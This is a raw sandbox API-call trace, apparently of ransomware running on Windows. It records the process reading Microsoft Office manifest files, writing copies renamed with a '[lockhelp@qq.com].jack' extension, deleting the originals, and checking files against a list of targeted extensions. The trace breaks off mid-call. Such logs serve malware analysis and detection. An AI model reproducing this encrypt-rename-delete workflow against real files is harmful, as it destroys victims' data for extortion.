[0205.420] CloseHandle (hObject=0x43c) returned 1 [0205.424] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.424] SetEndOfFile (hFile=0x3d4) returned 1 [0205.426] CloseHandle (hObject=0x3d4) returned 1 [0205.426] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.427] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml")) returned 1 [0205.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.427] lstrlenW (lpString=".doc") returned 4 [0205.427] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.427] lstrlenW (lpString=".docx") returned 5 [0205.427] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.427] lstrlenW (lpString=".pdf") returned 4 [0205.427] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.427] lstrlenW (lpString=".xls") returned 4 [0205.427] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.427] lstrlenW (lpString=".xlsx") returned 5 [0205.427] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.427] lstrlenW (lpString=".ppt") returned 4 [0205.427] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.427] lstrlenW (lpString=".zip") returned 4 [0205.427] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.427] lstrlenW (lpString=".rar") returned 4 [0205.427] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.427] lstrlenW (lpString=".bz2") returned 4 [0205.427] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString=".7z") returned 3 [0205.428] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.428] lstrlenW (lpString=".dbf") returned 4 [0205.428] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.428] lstrlenW (lpString=".1cd") returned 4 [0205.428] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.428] lstrlenW (lpString=".jpg") returned 4 [0205.428] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.428] lstrlenW (lpString=".doc") returned 4 [0205.428] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString=".docx") returned 5 [0205.428] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.428] lstrlenW (lpString=".pdf") returned 4 [0205.428] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString=".xls") returned 4 [0205.428] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString=".xlsx") returned 5 [0205.428] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.428] lstrlenW (lpString=".ppt") returned 4 [0205.428] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.428] lstrlenW (lpString=".zip") returned 4 [0205.428] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.428] lstrlenW (lpString=".rar") returned 4 [0205.428] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString=".bz2") returned 4 [0205.428] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.428] lstrlenW (lpString=".7z") returned 3 [0205.429] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.429] lstrlenW (lpString=".dbf") returned 4 [0205.429] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.429] lstrlenW (lpString=".1cd") returned 4 [0205.429] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0205.429] lstrlenW (lpString=".jpg") returned 4 [0205.429] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.429] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.429] lstrlenW (lpString="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 53 [0205.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.429] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=343329) returned 1 [0205.429] CloseHandle (hObject=0x3d4) returned 1 [0205.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml")) returned 0x220 [0205.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.430] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.430] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0205.430] GetLastError () returned 0x0 [0205.430] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x53d21, lpOverlapped=0x0) returned 1 [0205.551] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x53d30, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x53d30, lpOverlapped=0x0) returned 1 [0205.557] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0205.557] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.557] SetEndOfFile (hFile=0x43c) returned 1 [0205.557] CloseHandle (hObject=0x43c) returned 1 [0205.565] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.565] SetEndOfFile (hFile=0x3d4) returned 1 [0205.568] CloseHandle (hObject=0x3d4) returned 1 [0205.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.569] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml")) returned 1 [0205.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.569] lstrlenW (lpString=".doc") returned 4 [0205.569] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.569] lstrlenW (lpString=".docx") returned 5 [0205.569] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.569] lstrlenW (lpString=".pdf") returned 4 [0205.569] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.569] lstrlenW (lpString=".xls") returned 4 [0205.569] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.569] lstrlenW (lpString=".xlsx") returned 5 [0205.569] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.569] lstrlenW (lpString=".ppt") returned 4 [0205.569] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.569] lstrlenW (lpString=".zip") returned 4 [0205.569] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.569] lstrlenW (lpString=".rar") returned 4 [0205.569] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.569] lstrlenW (lpString=".bz2") returned 4 [0205.569] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString=".7z") returned 3 [0205.570] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.570] lstrlenW (lpString=".dbf") returned 4 [0205.570] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.570] lstrlenW (lpString=".1cd") returned 4 [0205.570] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.570] lstrlenW (lpString=".jpg") returned 4 [0205.570] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.570] lstrlenW (lpString=".doc") returned 4 [0205.570] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString=".docx") returned 5 [0205.570] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.570] lstrlenW (lpString=".pdf") returned 4 [0205.570] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString=".xls") returned 4 [0205.570] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString=".xlsx") returned 5 [0205.570] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.570] lstrlenW (lpString=".ppt") returned 4 [0205.570] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.570] lstrlenW (lpString=".zip") returned 4 [0205.570] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.570] lstrlenW (lpString=".rar") returned 4 [0205.570] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString=".bz2") returned 4 [0205.570] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.570] lstrlenW (lpString=".7z") returned 3 [0205.570] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.570] lstrlenW (lpString=".dbf") returned 4 [0205.570] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.571] lstrlenW (lpString=".1cd") returned 4 [0205.571] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0205.571] lstrlenW (lpString=".jpg") returned 4 [0205.571] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.571] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.571] lstrlenW (lpString="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 53 [0205.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.571] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=65002) returned 1 [0205.571] CloseHandle (hObject=0x3d4) returned 1 [0205.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0205.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.571] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.572] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0205.572] GetLastError () returned 0x0 [0205.572] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xfdea, lpOverlapped=0x0) returned 1 [0205.747] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xfdf0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xfdf0, lpOverlapped=0x0) returned 1 [0205.749] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0205.750] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.750] SetEndOfFile (hFile=0x43c) returned 1 [0205.750] CloseHandle (hObject=0x43c) returned 1 [0205.753] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.753] SetEndOfFile (hFile=0x3d4) returned 1 [0205.754] CloseHandle (hObject=0x3d4) returned 1 [0205.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml")) returned 1 [0205.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.755] lstrlenW (lpString=".doc") returned 4 [0205.755] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.755] lstrlenW (lpString=".docx") returned 5 [0205.755] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.755] lstrlenW (lpString=".pdf") returned 4 [0205.755] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.755] lstrlenW (lpString=".xls") returned 4 [0205.755] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.755] lstrlenW (lpString=".xlsx") returned 5 [0205.755] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.755] lstrlenW (lpString=".ppt") returned 4 [0205.755] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.756] lstrlenW (lpString=".zip") returned 4 [0205.756] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.756] lstrlenW (lpString=".rar") returned 4 [0205.756] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.756] lstrlenW (lpString=".bz2") returned 4 [0205.756] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.756] lstrlenW (lpString=".7z") returned 3 [0205.756] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.756] lstrlenW (lpString=".dbf") returned 4 [0205.756] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.756] lstrlenW (lpString=".1cd") returned 4 [0205.756] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.756] lstrlenW (lpString=".jpg") returned 4 [0205.756] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.756] lstrlenW (lpString=".doc") returned 4 [0205.756] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.756] lstrlenW (lpString=".docx") returned 5 [0205.756] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.756] lstrlenW (lpString=".pdf") returned 4 [0205.756] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.757] lstrlenW (lpString=".xls") returned 4 [0205.757] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.757] lstrlenW (lpString=".xlsx") returned 5 [0205.757] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.757] lstrlenW (lpString=".ppt") returned 4 [0205.757] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.757] lstrlenW (lpString=".zip") returned 4 [0205.757] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.757] lstrlenW (lpString=".rar") returned 4 [0205.757] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.757] lstrlenW (lpString=".bz2") returned 4 [0205.757] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.757] lstrlenW (lpString=".7z") returned 3 [0205.757] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.757] lstrlenW (lpString=".dbf") returned 4 [0205.757] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.757] lstrlenW (lpString=".1cd") returned 4 [0205.757] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0205.757] lstrlenW (lpString=".jpg") returned 4 [0205.757] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.758] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.758] lstrlenW (lpString="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 53 [0205.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.758] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=1261) returned 1 [0205.758] CloseHandle (hObject=0x3d4) returned 1 [0205.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.759] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.759] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft 